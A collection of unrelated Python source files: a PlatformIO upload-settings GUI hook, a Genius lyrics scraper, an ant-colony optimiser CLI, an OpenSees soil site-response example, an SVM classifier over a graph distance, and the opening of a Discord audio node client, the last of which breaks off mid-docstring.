input_ip_address.pack(fill="x", expand=True)
label_port.pack(fill="x", expand=False)
input_port.pack(fill="x", expand=True)
label_password.pack(fill="x", expand=False)
input_password.pack(fill="x", expand=True)
button_upload = tk.Button(frame, text="Upload", command=self._on_upload)
button_upload.pack(fill="x", expand=False)
frame.pack(fill="x", expand=True, padx=20, pady=20)
self._update_gui()
self.update()
self.minsize(frame.winfo_width(), frame.winfo_height())
self.protocol("WM_DELETE_WINDOW", lambda: self.quit() and self.close())
def run(self):
"""Run the main application.
"""
self._setup_gui()
self.mainloop()
self._update_model()
if False is self._is_aborted:
env.Replace( # type: ignore
UPLOAD_PORT=self._upload_model.get_ip_address(),
UPLOAD_FLAGS=["--port=" + str(self._upload_model.get_port()), "--auth=" + self._upload_model.get_password()]
)
else:
print("Aborted. Using upload parameters from platform.ini")
def _on_upload(self):
self._update_model()
self._upload_model.save()
self._is_aborted = False
self.quit()
def before_upload(source, target, env): # pylint: disable=unused-argument
"""This function is called after build process and before the upload starts.
Args:
source (SCons.Node.FS.File): Source file as file object
target (SCons.Node.Alias.Alias): Alias object
env (SCons.Script.SConscript.SConsEnvironment): Environment object
"""
app = App()
app.run()
# pylint: disable=undefined-variable
env.AddPreAction("upload", before_upload) # type: ignore
# pylint: disable=undefined-variable
env.AddPreAction("uploadfs", before_upload) # type: ignore
|
<reponame>Fingolfin7/Music-Metadata-and-Lyrics<filename>Source/GeniusLyrics.py
import requests
import get_auth_token
from functions import remove_non_ascii
from check_internet import check_internet
from ColourText import format_text
from SongsDict import SongDict
from bs4 import BeautifulSoup
GENIUS_TOKEN = get_auth_token.get_token()
if GENIUS_TOKEN is None:
print('Please create the auth_token.txt file inside the Source folder and put in a Genius Token.')
exit()
# a class containing a dictionary with all the saved lyrics from previous searches
song_dict = SongDict()
def search_song_lyrics(song_name="", song_artist=""):
def online_search():
# use the song and artist names to search genius.com
query = {"q": f"{song_name} {song_artist}",
"text_format": "plain"}
title = ""
artist = ""
headers = {"Authorization": f"Bearer {GENIUS_TOKEN}"}
base_url = "https://api.genius.com/"
# get the results as a json file
data = requests.get(f"https://api.genius.com/search/", params=query, headers=headers).json()
found_song = None
# searches the returned hits
for hit in data['response']['hits']:
# compare the returned song title and artist name to the function arguments
result_title = str(hit['result']['title']).lower() + str(hit['result']['primary_artist']['name']).lower()
if result_title.find(song_artist.lower()) != -1 or result_title.find(
song_name.lower()) != -1: # if we can find the artist or song name, then we have found our song
found_song = hit
title = hit['result']['title_with_featured']
artist = hit['result']['primary_artist']['name']
print(format_text(f"Found: [bright yellow][italic]'{title}' by '{artist}'[reset]"))
break
if found_song: # if we have found a hit
song_id = found_song['result']['id'] # get the song's id
# search genius for the song using it's id and get the 'path' to the document containing the song's lyrics
song_data = requests.get(f"{base_url}songs/{song_id}", headers=headers).json()
path = song_data['response']['song']['path']
# use beautifulsoup to scrape the lyric page for just the song lyrics
page = requests.get(f"http://genius.com{path}")
html = BeautifulSoup(page.text, "html.parser")
# remove script tags that they put in the middle of the lyrics
[h.extract() for h in html(['style', 'script'])]
try:
# Genius has a tag called 'lyrics'
scraped_lyrics = html.find('div', class_='lyrics').get_text()
# save to the dictionary object. These can then be retrieved later on for an offline search
artist = remove_non_ascii(artist)
title = remove_non_ascii(title)
song_dict.save_to_dict(artist, title, scraped_lyrics)
song_dict.save_dict()
except:
scraped_lyrics = None
# return lyrics
return scraped_lyrics
else:
return found_song
# offline search. search the dictionary object for song lyrics
def offline_search():
for artist_key in song_dict.dict: # loop through artists
if artist_key.lower().find(song_artist.lower()) != -1: # if artist name is found in key
for song in song_dict.dict[artist_key]: # loop through song keys in artist dict
if song.lower().find(song_name.lower()) != -1: # if a song name is found in song key
print(format_text(f"Found: [bright yellow][italic]'{song}' by"
f" '{artist_key}'[reset]"))
return song_dict.dict[artist_key][song]
return None
# first try an offline search
song_artist = remove_non_ascii(song_artist)
song_name = remove_non_ascii(song_name)
offline_search = offline_search()
if offline_search is not None:
return offline_search
# if nothing is found, and there is an internet connection, do an online search
elif check_internet() and offline_search is None:
count = 0
print(format_text("Searching [italic][bright yellow]Genius.com[reset] for lyrics"))
while count < 3: # Try online search 3 times before doing an offline search
value = online_search()
if value is None:
print(format_text(f"[italic][bright red]Try {count + 1} failed.[reset]\n"))
count += 1
else:
return value
# if nothing was found from the offline and online searches
print(format_text(f"Lyrics for [bright yellow][italic]'{song_name}' by '{song_artist}'[reset] not found.\n"))
# if the song isn't found, search for the artist and print a list of the available song lyrics
for artist_key in song_dict.dict:
if artist_key.lower().find(song_artist.lower()) != -1:
print(format_text(f"Songs from [bright yellow][italic]{artist_key}[reset]"))
index = 0
for found_song in song_dict.dict[artist_key]:
print(format_text(f"[bright yellow][italic]{index + 1}. {found_song}[reset]"))
index += 1
print()
return None
def main():
import os
os.system("cls")
print(search_song_lyrics("Take Care", "Drake"))
input()
if __name__ == "__main__":
main()
|
<reponame>DreamBoatOve/aia_eis<filename>v0/aia_eis_v0/goa/swarm_based/ant_colony/learning_examples/acopy/acopy/cli.py
# -*- coding: utf-8 -*-
"""Console script for acopy."""
import time
import random
import click
from . import ant
from . import solvers
from . import plugins
from . import utils
def solver_options(f):
click.option('--seed',
type=str,
default=None,
help='set the random seed')(f)
click.option('--plot',
default=False,
is_flag=True,
help='enable pretty graphs that show interation data (you '
'must have matplotlib and pandas installed)')(f)
click.option('--darwin',
default=0.0,
help='sigma factor for variation of the alpha/beta settings '
'for ants between iterations')(f)
click.option('--flip',
type=int,
default=None,
help='seconds between periodic inversions of the pheromone '
'levels on all edges, meaning the edges with the least '
'pheromone will have the most and vice versa')(f)
click.option('--threshold',
type=float,
default=None,
help='solution value below which the solver will stop')(f)
click.option('--reset',
type=int,
default=False,
help='seconds between periodic resets of the pheromone '
'levels on all edges')(f)
click.option('--elite',
default=0.0,
help='how many times the best solution is re-traced')(f)
click.option('--limit',
default=2000,
show_default=True,
help='maximum number of iterations to perform')(f)
click.option('--ants',
type=int,
default=None,
help='number of ants to use (defaults to number of nodes)')(f)
click.option('--top',
type=int,
default=None,
help='number of ants that deposit pheromone (defaults to '
'all)')(f)
click.option('--q',
default=1.0,
help='amount of pheromone each ant has')(f)
click.option('--rho',
default=0.03,
help='rate of pheromone evaporation')(f)
click.option('--beta',
default=3.0,
help='how much pheromone matters')(f)
click.option('--alpha',
default=1.0,
help='how much distance matters')(f)
return f
def run_solver(graph, alpha, beta, rho, q, limit, top, ants, seed,
plugin_settings):
if plugin_settings.get('plot') and not utils.is_plot_enabled():
raise click.UsageError('you must install matplotlib and pandas to '
'use the --plot option')
seed = seed or str(hash(time.time()))
click.echo(f'SEED={seed}')
random.seed(seed)
colony = ant.Colony(alpha=alpha, beta=beta)
solver = solvers.Solver(rho=rho, q=q, top=top)
click.echo(solver)
printout = plugins.Printout()
click.echo(f'Registering plugin: {printout}')
solver.add_plugin(printout)
timer = plugins.Timer()
click.echo(f'Registering plugin: {timer}')
solver.add_plugin(timer)
if plugin_settings.get('darwin'):
plugin = plugins.Darwin(sigma=plugin_settings['darwin'])
click.echo(f'Registering plugin: {plugin}')
solver.add_plugin(plugin)
if plugin_settings.get('elite'):
plugin = plugins.EliteTracer(factor=plugin_settings['elite'])
click.echo(f'Registering plugin: {plugin}')
solver.add_plugin(plugin)
if plugin_settings.get('reset'):
plugin = plugins.PeriodicReset(period=plugin_settings['reset'])
click.echo(f'Registering plugin: {plugin}')
solver.add_plugin(plugin)
if plugin_settings.get('flip'):
plugin = plugins.PheromoneFlip(period=plugin_settings['flip'])
click.echo(f'Registering plugin: {plugin}')
solver.add_plugin(plugin)
if plugin_settings.get('threshold'):
plugin = plugins.Threshold(plugin_settings['threshold'])
click.echo(f'Registering plugin: {plugin}')
solver.add_plugin(plugin)
if plugin_settings.get('plot'):
recorder = plugins.StatsRecorder()
click.echo(f'Registering plugin: {recorder}')
solver.add_plugin(recorder)
else:
recorder = None
solver.solve(graph, colony, gen_size=ants, limit=limit)
click.echo(timer.get_report())
if recorder:
plotter = utils.plot.Plotter(recorder.stats)
plotter.plot()
@click.group()
def main():
if not utils.is_plot_enabled():
click.echo(click.style('warning: plotting feature disabled',
fg='yellow'))
@main.command(short_help='run the demo')
@solver_options
def demo(alpha, beta, rho, q, limit, top, ants, seed, **plugin_settings):
"""Run the solver against the 33-city demo graph."""
graph = utils.data.get_demo_graph()
run_solver(graph, alpha, beta, rho, q, limit, top, ants, seed,
plugin_settings)
@main.command(short_help='use the solver on a graph')
@solver_options
@click.argument('filepath',
type=click.Path(dir_okay=False, readable=True))
@click.option('--format',
default='json',
type=click.Choice(utils.data.get_formats()),
show_default=True,
metavar='FORMAT',
help='format of the file containing the graph to use; choices '
f'are {", ".join(global_optimizations.swarm_based.ant_colony.learning_examples.acopy.acopy.utils.data.get_formats())}')
def solve(alpha, beta, rho, q, limit, top, ants, filepath, format, seed,
**plugin_settings):
"""Use the solver on a graph in a file in one of several formats."""
try:
graph = utils.data.read_graph_data(filepath, format)
except Exception:
raise click.UsageError(f'failed to parse {filepath} as {format}')
run_solver(graph, alpha, beta, rho, q, limit, top, ants, seed,
plugin_settings)
if __name__ == "__main__":
main()
|
<gh_stars>0
import eqsig
from collections import OrderedDict
import numpy as np
import sfsimodels as sm
import o3seespy as o3
def site_response(sp, asig, linear=0):
"""
Run seismic analysis of a soil profile - example based on:
http://opensees.berkeley.edu/wiki/index.php/Site_Response_Analysis_of_a_Layered_Soil_Column_(Total_Stress_Analysis)
:param sp: sfsimodels.SoilProfile object
A soil profile
:param asig: eqsig.AccSignal object
An acceleration signal
:return:
"""
osi = o3.OpenSeesInstance(ndm=2, ndf=2, state=3)
assert isinstance(sp, sm.SoilProfile)
sp.gen_split(props=['shear_vel', 'unit_mass', 'cohesion', 'phi', 'bulk_mod', 'poissons_ratio', 'strain_peak'])
thicknesses = sp.split["thickness"]
n_node_rows = len(thicknesses) + 1
node_depths = np.cumsum(sp.split["thickness"])
node_depths = np.insert(node_depths, 0, 0)
ele_depths = (node_depths[1:] + node_depths[:-1]) / 2
shear_vels = sp.split["shear_vel"]
unit_masses = sp.split["unit_mass"] / 1e3
g_mods = unit_masses * shear_vels ** 2
poissons_ratio = sp.split['poissons_ratio']
youngs_mods = 2 * g_mods * (1 - poissons_ratio)
bulk_mods = youngs_mods / (3 * (1 - 2 * poissons_ratio))
bulk_mods = sp.split['bulk_mod'] / 1e3
ref_pressure = 80.0
cohesions = sp.split['cohesion'] / 1e3
phis = sp.split['phi']
strain_peaks = sp.split['strain_peak']
grav = 9.81
damping = 0.03
omega_1 = 2 * np.pi * 0.5
omega_2 = 2 * np.pi * 10
a0 = 2 * damping * omega_1 * omega_2 / (omega_1 + omega_2)
a1 = 2 * damping / (omega_1 + omega_2)
newmark_gamma = 0.5
newmark_beta = 0.25
ele_width = min(thicknesses)
total_soil_nodes = len(thicknesses) * 2 + 2
# Define nodes and set boundary conditions for simple shear deformation
# Start at top and build down?
nd = OrderedDict()
nd["R0L"] = o3.node.Node(osi, 0, 0) # row 0 left
nd["R0R"] = o3.node.Node(osi, ele_width, 0)
for i in range(1, n_node_rows):
# Establish left and right nodes
nd[f"R{i}L"] = o3.node.Node(osi, 0, -node_depths[i])
nd[f"R{i}R"] = o3.node.Node(osi, ele_width, -node_depths[i])
# set x and y dofs equal for left and right nodes
o3.EqualDOF(osi, nd[f"R{i}L"], nd[f"R{i}R"], [o3.cc.X, o3.cc.Y])
# Fix base nodes
o3.Fix2DOF(osi, nd[f"R{n_node_rows - 1}L"], o3.cc.FREE, o3.cc.FIXED)
o3.Fix2DOF(osi, nd[f"R{n_node_rows - 1}R"], o3.cc.FREE, o3.cc.FIXED)
# Define dashpot nodes
dashpot_node_l = o3.node.Node(osi, 0, -node_depths[-1])
dashpot_node_2 = o3.node.Node(osi, 0, -node_depths[-1])
o3.Fix2DOF(osi, dashpot_node_l, o3.cc.FIXED, o3.cc.FIXED)
o3.Fix2DOF(osi, dashpot_node_2, o3.cc.FREE, o3.cc.FIXED)
# define equal DOF for dashpot and soil base nodes
o3.EqualDOF(osi, nd[f"R{n_node_rows - 1}L"], nd[f"R{n_node_rows - 1}R"], [o3.cc.X])
o3.EqualDOF(osi, nd[f"R{n_node_rows - 1}L"], dashpot_node_2, [o3.cc.X])
# define materials
ele_thick = 1.0 # m
soil_mats = []
strains = np.logspace(-6, -0.5, 16)
ref_strain = 0.005
rats = 1. / (1 + (strains / ref_strain) ** 0.91)
eles = []
for i in range(len(thicknesses)):
if not linear:
mat = o3.nd_material.PressureIndependMultiYield(osi, 2, unit_masses[i], g_mods[i],
bulk_mods[i], cohesions[i], strain_peaks[i],
phis[i], press_depend_coe=0.0, no_yield_surf=16,
strains=strains, ratios=rats)
else:
mat = o3.nd_material.ElasticIsotropic(osi, youngs_mods[i], poissons_ratio[i], rho=unit_masses[i])
soil_mats.append(mat)
# def element
nodes = [nd[f"R{i + 1}L"], nd[f"R{i + 1}R"], nd[f"R{i}R"], nd[f"R{i}L"]]
ele = o3.element.Quad(osi, nodes, ele_thick, o3.cc.PLANE_STRAIN, mat, b2=grav * unit_masses[i])
eles.append(ele)
# define material and element for viscous dampers
c_base = ele_width * unit_masses[-1] * shear_vels[-1]
dashpot_mat = o3.uniaxial_material.Viscous(osi, c_base, alpha=1.)
o3.element.ZeroLength(osi, [dashpot_node_l, dashpot_node_2], mats=[dashpot_mat], dirs=[o3.cc.DOF2D_X])
# Static analysis
o3.constraints.Transformation(osi)
o3.test_check.NormDispIncr(osi, tol=1.0e-4, max_iter=30, p_flag=0)
o3.algorithm.Newton(osi)
o3.numberer.RCM(osi)
o3.system.ProfileSPD(osi)
o3.integrator.Newmark(osi, newmark_gamma, newmark_beta)
o3.analysis.Transient(osi)
o3.analyze(osi, 40, 1.)
# for i in range(len(soil_mats)):
# o3.update_material_stage(osi, soil_mats[i], 1)
o3.analyze(osi, 50, 0.5)
# reset time and analysis
o3.set_time(osi, 0.0)
o3.wipe_analysis(osi)
# o3.recorder.NodeToFile(osi, 'sample_out.txt', node=nd["R0L"], dofs=[o3.cc.X], res_type='accel')
na = o3.recorder.NodeToArrayCache(osi, node=nd["R0L"], dofs=[o3.cc.X], res_type='accel')
es = o3.recorder.ElementsToArrayCache(osi, elements=eles, arg_vals=['stress'])
# Define the dynamic analysis
ts_obj = o3.time_series.Path(osi, dt=asig.dt, values=asig.velocity * -1, factor=c_base)
o3.pattern.Plain(osi, ts_obj)
o3.Load(osi, nd["R{0}L".format(n_node_rows - 1)], [1., 0.])
# Run the dynamic analysis
o3.algorithm.Newton(osi)
o3.system.SparseGeneral(osi)
o3.numberer.RCM(osi)
o3.constraints.Transformation(osi)
o3.integrator.Newmark(osi, newmark_gamma, newmark_beta)
o3.rayleigh.Rayleigh(osi, a0, a1, 0, 0)
o3.analysis.Transient(osi)
o3.test_check.EnergyIncr(osi, tol=1.0e-10, max_iter=10)
analysis_time = asig.time[-1]
analysis_dt = 0.01
# o3.extensions.to_py_file(osi)
while o3.get_time(osi) < analysis_time:
o3.analyze(osi, 1, analysis_dt)
o3.wipe(osi)
outputs = {
"time": np.arange(0, analysis_time, analysis_dt),
"rel_disp": [],
"rel_accel": na.collect(),
'ele_stresses': es.collect()
}
return outputs
def run_pysra(soil_profile, asig, odepths):
import pysra
import liquepy as lq
pysra_profile = lq.sra.sm_profile_to_pysra(soil_profile, d_inc=[0.5] * soil_profile.n_layers)
# Should be input in g
pysra_m = pysra.motion.TimeSeriesMotion(asig.label, None, time_step=asig.dt, accels=-asig.values / 9.8)
calc = pysra.propagation.LinearElasticCalculator()
od = {}
outs = []
for i, depth in enumerate(odepths):
od["ACCX_d%i" % i] = len(outs)
outs.append(pysra.output.AccelerationTSOutput(pysra.output.OutputLocation('within', depth=depth)))
outputs = pysra.output.OutputCollection(outs)
calc(pysra_m, pysra_profile, pysra_profile.location('outcrop', depth=soil_profile.height))
outputs(calc)
out_series = {}
for item in od:
out_series[item] = outputs[od[item]].values[:asig.npts] * 9.8
return out_series
def run(show=0, export=0):
sl = sm.Soil()
vs = 160.
unit_mass = 1700.0
sl.cohesion = 58.0e3
sl.phi = 0.0
sl.g_mod = vs ** 2 * unit_mass
sl.poissons_ratio = 0.0
sl.phi = 0.0
sl.unit_dry_weight = unit_mass * 9.8
sl.strain_peak = 0.1 # set additional parameter required for PIMY model
sl.xi = 0.03 # for linear analysis
assert np.isclose(vs, sl.get_shear_vel(saturated=False))
soil_profile = sm.SoilProfile()
soil_profile.add_layer(0, sl)
sl = sm.Soil()
vs = 400.
unit_mass = 1700.0
sl.g_mod = vs ** 2 * unit_mass
sl.poissons_ratio = 0.0
sl.cohesion = 395.0e3
sl.phi = 0.0
sl.unit_dry_weight = unit_mass * 9.8
sl.strain_peak = 0.1 # set additional parameter required for PIMY model
sl.xi = 0.03 # for linear analysis
soil_profile.add_layer(9.5, sl)
soil_profile.height = 20.0
ecp_out = sm.Output()
ecp_out.add_to_dict(soil_profile)
if export:
import json
ofile = open('ecp.json', 'w')
ofile.write(json.dumps(ecp_out.to_dict(), indent=4))
ofile.close()
from tests.conftest import TEST_DATA_DIR
record_path = TEST_DATA_DIR
record_filename = 'test_motion_dt0p01.txt'
dt = 0.01
rec = np.loadtxt(record_path + record_filename) / 2
acc_signal = eqsig.AccSignal(rec, dt)
outputs = site_response(soil_profile, acc_signal, linear=1)
tot_acc = np.sum(abs(outputs['rel_accel']))
assert np.isclose(tot_acc, 515.76262984), tot_acc # v3.1.0.11
resp_dt = outputs['time'][2] - outputs['time'][1]
surf_sig = eqsig.AccSignal(outputs['rel_accel'], resp_dt)
if show:
lw = 0.7
import matplotlib.pyplot as plt
from bwplot import cbox
bf, sps = plt.subplots(nrows=3)
# linear analysis with pysra
od = run_pysra(soil_profile, acc_signal, odepths=np.array([0.0, 2.0]))
pysra_sig = eqsig.AccSignal(od['ACCX_d0'], acc_signal.dt)
sps[0].plot(acc_signal.time, acc_signal.values, c='k', lw=lw)
sps[0].plot(surf_sig.time, surf_sig.values, c=cbox(0), lw=lw)
sps[0].plot(acc_signal.time, pysra_sig.values, c=cbox(1), lw=lw)
sps[1].plot(acc_signal.fa_frequencies, abs(acc_signal.fa_spectrum), c='k', label='Input', lw=lw)
sps[1].plot(surf_sig.fa_frequencies, abs(surf_sig.fa_spectrum), c=cbox(0), label='O3', lw=lw)
sps[1].plot(pysra_sig.fa_frequencies, abs(pysra_sig.fa_spectrum), c=cbox(1), label='pysra', lw=lw)
sps[1].set_xlim([0, 20])
h = surf_sig.smooth_fa_spectrum / acc_signal.smooth_fa_spectrum
sps[2].plot(surf_sig.smooth_fa_frequencies, h, c=cbox(0))
pysra_h = pysra_sig.smooth_fa_spectrum / acc_signal.smooth_fa_spectrum
sps[2].plot(pysra_sig.smooth_fa_frequencies, pysra_h, c=cbox(1))
# o3_nl_h = nl_surf_sig.smooth_fa_spectrum / acc_signal.smooth_fa_spectrum
# sps[2].plot(nl_surf_sig.smooth_fa_frequencies, o3_nl_h, c=cbox(2))
sps[2].axhline(1, c='k', ls='--')
sps[1].legend()
plt.show()
print(outputs)
if __name__ == '__main__':
run()
|
<filename>lib/custom_svc.py
from sklearn.svm import SVC
import numpy as np
from sklearn.base import TransformerMixin
from ot_distances import RJW_distance
import time
from scg_optimizer import NonConvergenceError
from sklearn.exceptions import NotFittedError
class InfiniteException(Exception):
pass
class NanErrorInDist(Exception):
pass
"""
The following classes are used to create a SVM classifier over the RJW distance using the indefinite kernel e^{-\gamma*RJW}
"""
class GenericSVCClassifier(TransformerMixin):
""" GenericSVCClassifier is a sklearn compatible class.
It computes a SVM classifier over a any type of data as long as a similarity measure is defined.
More precisely if f is a similarity measure it computes a SVM on a precomputed similarity matrix
K=exp{-gamma*f(x,y)} for all x,y
Attributes
----------
similarity_measure : a method
The similarity mesure between the points
gamma : float
The gamma parameter in the similarity matrix K=exp{-gamma*f(x,y)}
D : ndarray
The similarity matrix f(x,y)
svc : the SVM classifier from sklearn
C : float
The C parameter of the SVM
"""
def __init__(self,similarity_measure,C=1,gamma=1,verbose=False,always_raise=False):
self.similarity_measure = similarity_measure
self.gamma=gamma
self.C=C
self.verbose=verbose
self.D=None
self.similarity_measure_time=[]
self.infiniteExceptionOccuredInFit=False
self.always_raise=always_raise
self.svc=SVC(C=self.C,kernel="precomputed",verbose=self.verbose,max_iter=10000000) #rbf
def compute_similarity(self,x,y):
""" Compute the similarity between x and y using the similarity_measure
Parameters
----------
x : a abstract object
y : a astract object
Returns
-------
A float representative of the similarity
"""
start=time.time()
try:
similarity=self.similarity_measure(x,y)
except NonConvergenceError:
print('NonConvergenceError for ',x.characterized(),y.characterized())
similarity=np.nan
if self.always_raise:
raise NanErrorInDist
if np.isnan(similarity) and self.always_raise:
raise NanErrorInDist
end=time.time()
self.similarity_measure_time.append(end-start)
return similarity
def gram_matrix(self,X,Y,matrix=None,method='classic'):
""" Compute the similarity matrix K=exp{-gamma*f(x,y)} with f the similarity measure
for all x,y in X and Y
Parameters
----------
X : array of abstract object
Y : array of abstract object
matrix : ndarray, optionnal
If specified used to compute the similarity matrix instead of calculating all the similarities
method : string
If equal to classic compute K=exp{-gamma*f(x,y)}, if equal to no_gaussian compute only f(x,y)
Returns
-------
D : ndarray
The gram matrix of all similarities K=exp{-gamma*f(x,y)} or f(x,y) if method='no_gaussian'
"""
self.compute_all_distance(X,Y,matrix)
if method=='classic':
Z=np.exp(-self.gamma*(self.D))
if not self.assert_all_finite(Z):
raise InfiniteException('There is Nan')
else:
return Z
if method=='no_gaussian':
return self.D
def fit(self,X,y=None,matrix=None):
""" Fit the SVM classifier on the similarity matrix
Parameters
----------
X : array of abstract object
y : classes of all objects
matrix : ndarray, optionnal
If specified used to compute the similarity matrix instead of calculating all the similarities
Returns
-------
self
"""
self.classes_ =np.array(y)
self._fit_X=np.array(X)
Gtrain = np.zeros((X.shape[0],X.shape[0]))
start=time.time()
try :
Gtrain = self.gram_matrix(X,X,matrix,method='classic')
self.svc.fit(Gtrain,self.classes_)
if self.verbose:
print('Time fit : ',time.time()-start)
except InfiniteException:
self.infiniteExceptionOccuredInFit=True
print('InfiniteException : value error in fit because nan')
return self
def predict(self,X,matrix=None):
""" Apply the SVM classifier on X
Parameters
----------
X : array of abstract object
matrix : ndarray, optionnal
If specified used to compute the similarity matrix instead of calculating all the similarities
Returns
-------
self
"""
try :
G=self.gram_matrix(X,self._fit_X,matrix,method='classic')
preds=self.svc.predict(G)
except InfiniteException:
print('InfiniteException : Preds error because nan')
preds=np.repeat(-10,len(X)) # Dirty trick so that preds are not None
except NotFittedError:
if self.infiniteExceptionOccuredInFit :
print('NotFittedError : nan dans la gram de fit mais pas dans celle de test')
preds=np.repeat(-10,len(X)) # Dirty trick so that preds are not None
else:
raise NotFittedError
return preds
def assert_all_finite(self,X):
"""Like assert_all_finite, but only for ndarray."""
X = np.asanyarray(X)
a=X.dtype.char in np.typecodes['AllFloat']
b=np.isfinite(X.sum())
c=np.isfinite(X).all()
if (a and not b and not c):
return False
else :
return True
def compute_all_distance(self,X,Y,matrix=None):
""" Compute all similarities f(x,y) for x,y in X and Y and f the similarity measure
Parameters
----------
X : array of abstract object
Y : array of abstract object
matrix : ndarray, optionnal
If specified used to compute the similarity matrix instead of calculating all the similarities
Returns
-------
None. Set the similarity matrix
"""
if matrix is not None :
self.D=matrix
else:
X=X.reshape(X.shape[0],)
Y=Y.reshape(Y.shape[0],)
if np.all(X==Y):
D= np.zeros((X.shape[0], Y.shape[0]))
H=np.zeros((X.shape[0], Y.shape[0]))
for i, x1 in enumerate(X):
for j,x2 in enumerate(Y):
if j>=i:
dist=self.compute_similarity(x1, x2)
D[i, j] = dist
np.fill_diagonal(H,np.diagonal(D))
D=D+D.T-H
else:
D = np.zeros((X.shape[0], Y.shape[0]))
for i, x1 in enumerate(X):
row=[self.compute_similarity(x1, x2) for j,x2 in enumerate(Y)]
D[i,:]=row
D[np.abs(D)<=1e-15]=0 #threshold due to numerical precision
self.D=D
def set_one_param(self,dicto,key):
if key in dicto:
setattr(self, key, dicto[key])
def get_params(self, deep=True):
return {"similarity_measure":self.similarity_measure,"gamma":self.gamma,"C":self.C}
def get_distances_params(self):
return {"similarity_measure":self.similarity_measure}
def set_params(self, **parameters):
self.set_one_param(parameters,"similarity_measure")
self.set_one_param(parameters,"C")
self.set_one_param(parameters,"gamma")
self.svc=SVC(C=self.C,kernel="precomputed",verbose=self.verbose,max_iter=10000000)
return self
class Graph_RJW_SVC_Classifier(GenericSVCClassifier):
""" Graph_RJW_SVC_Classifier is a generic class that inherit from GenericSVCClassifier.
Attributes
----------
gw : a RJW_distance instance
The RJW_distance class for computing RJW
alpha : float
The alpha parameter of RJW
method : string
The name of the method used to compute the structures matrices of the graphs. See Graph class
max_iter : integer
Number of iteration of the FW algorithm for the computation of RJW.
features_metric : string
The name of the method used to compute the cost matrix between the features
transp : ndarray, shape (ns,nt)
The transport matrix between the source distribution and the target distribution
amijo : bool, optionnal
If True the steps of the line-search is found via an amijo research. Else closed form is used.
If there is convergence issues use False.
wl : integer
Parameter Weisfeler-Lehman attributes.
"""
def __init__(self,C=1,gamma=1,alpha=1,beta=0.5,method='random_walk',features_metric='sqeuclidean',
verbose=False,always_raise=False,amijo=True,wl=0):
self.rjw=RJW_distance(alpha=alpha,method=method,features_metric=features_metric,amijo=amijo)
similarity_measure=self.rjw.graph_d
GenericSVCClassifier.__init__(self,similarity_measure=similarity_measure,C=C,gamma=gamma,verbose=verbose)
self.alpha=alpha
self.beta=beta
self.features_metric=features_metric
self.method=method
self.wl=wl
self.amijo=amijo
GenericSVCClassifier.__init__(self,C=C,gamma=gamma,similarity_measure=similarity_measure,verbose=verbose,
always_raise=always_raise)
def fit(self,X,y=None,matrix=None):
self.classes_ = y
self._fit_X = list(X.reshape(X.shape[0],))
for x in self._fit_X :
if x.C is None or x.name_struct_dist!=self.method:
if self.verbose:
print('******************************************************')
print('Construction des matrices de structures')
if x.C is not None:
print('before ',x.name_struct_dist)
print('nw ',self.method)
else:
print('Because structure is None')
print('******************************************************')
_=x.distance_matrix(method=self.method,force_recompute=True)
super(Graph_RJW_SVC_Classifier,self).fit(X,y,matrix)
def get_params(self, deep=True):
return {"alpha":self.alpha
,"features_metric":self.features_metric
,"method":self.method
,"C":self.C
,"gamma":self.gamma
,"amijo":self.amijo
,"wl":self.wl
}
def set_params(self, **parameters):
self.set_one_param(parameters,"alpha")
self.set_one_param(parameters,"features_metric")
self.set_one_param(parameters,"method")
self.set_one_param(parameters,"C")
self.set_one_param(parameters,"gamma")
self.set_one_param(parameters,"amijo")
self.set_one_param(parameters,"wl")
self.svc=SVC(C=self.C,kernel="precomputed",verbose=self.verbose,max_iter=10000000) # rbf
rjw2=RJW_distance(alpha=self.alpha,beta=self.beta, method=self.method,
features_metric=self.features_metric,
amijo=self.amijo)
if self.rjw.get_tuning_params()!=rjw2.get_tuning_params():
self.rjw=RJW_distance(alpha=self.alpha,method=self.method,features_metric=self.features_metric,
amijo=self.amijo)
self.similarity_measure=self.rjw.graph_d
return self
def get_distances_params(self):
dall = {}
dall.update(self.rjw.get_tuning_params())
dall.update({'wl':self.wl})
return dall |
<filename>slate/client.py<gh_stars>0
from __future__ import annotations
import logging
import random
from typing import MutableMapping, Optional, Protocol, Type, Mapping
import aiohttp
import discord
from .bases import BaseNode
from .exceptions import NoNodesAvailable, NodeCreationError, NodeNotFound, PlayerAlreadyExists
from .player import Player
__log__ = logging.getLogger(__name__)
class Client:
"""
The client used to manage Nodes and Players.
Parameters
----------
bot: :py:class:`typing.Protocol` [ :py:class:`discord.Client` ]
The bot instance that this :class:`Client` should be associated with.
session: :py:class:`typing.Optional` [ :py:class:`aiohttp.ClientSession` ]
The aiohttp client session used to make requests and connect to websockets with. If not passed, a new client session will be made.
"""
def __init__(self, *, bot: Protocol[discord.Client], session: Optional[aiohttp.ClientSession] = None) -> None:
self._bot: Protocol[discord.Client] = bot
self._session: aiohttp.ClientSession = session or aiohttp.ClientSession()
self._nodes: MutableMapping[str, Protocol[BaseNode]] = {}
def __repr__(self) -> str:
return f'<slate.Client node_count={len(self.nodes)} player_count={len(self.players)}>'
#
@property
def bot(self) -> Protocol[discord.Client]:
"""
:py:class:`Protocol` [ :py:class:`discord.Client` ]:
The bot instance that this :class:`Client` is connected to.
"""
return self._bot
@property
def session(self) -> aiohttp.ClientSession:
"""
:py:class:`aiohttp.ClientSession`:
The aiohttp session used to make requests and connect to Node websockets with.
"""
return self._session
#
@property
def nodes(self) -> MutableMapping[str, Protocol[BaseNode]]:
"""
:py:class:`typing.MutableMapping` [ :py:class:`str` , :py:class:`typing.Protocol` [ :py:class:`BaseNode` ] ]:
A mapping of Node identifier's to Nodes that this Client is managing.
"""
return self._nodes
@property
def players(self) -> Mapping[int, Protocol[Player]]:
"""
:py:class:`typing.Mapping` [ :py:class:`int` , :py:class:`typing.Protocol` [ :py:class:`Player`] ]:
A mapping of Player guild id's to Players across all the nodes that this Client is managing.
"""
players = []
for node in self.nodes.values():
players.extend(node.players.values())
return {player.guild.id: player for player in players}
#
async def create_node(self, *, host: str, port: str, password: str, identifier: str, cls: Type[Protocol[BaseNode]], **kwargs) -> Protocol[BaseNode]:
"""
Creates a Node and attempts to connect to an external nodes websocket. (:resource:`Andesite <andesite>`, :resource:`Lavalink <lavalink>`, etc)
Parameters
----------
host: :py:class:`str`
The host address to attempt connection with.
port: :py:class:`int`
The port to attempt connection with.
password: :py:class:`str`
The password used for authentification.
identifier: :py:class:`str`
A unique identifier used to refer to the created Node.
cls: :py:class:`typing.Type` [ :py:class:`typing.Protocol` [ :py:class:`BaseNode` ] ]
The class used to connect to the external node. Must be a subclass of :py:class:`BaseNode`.
**kwargs:
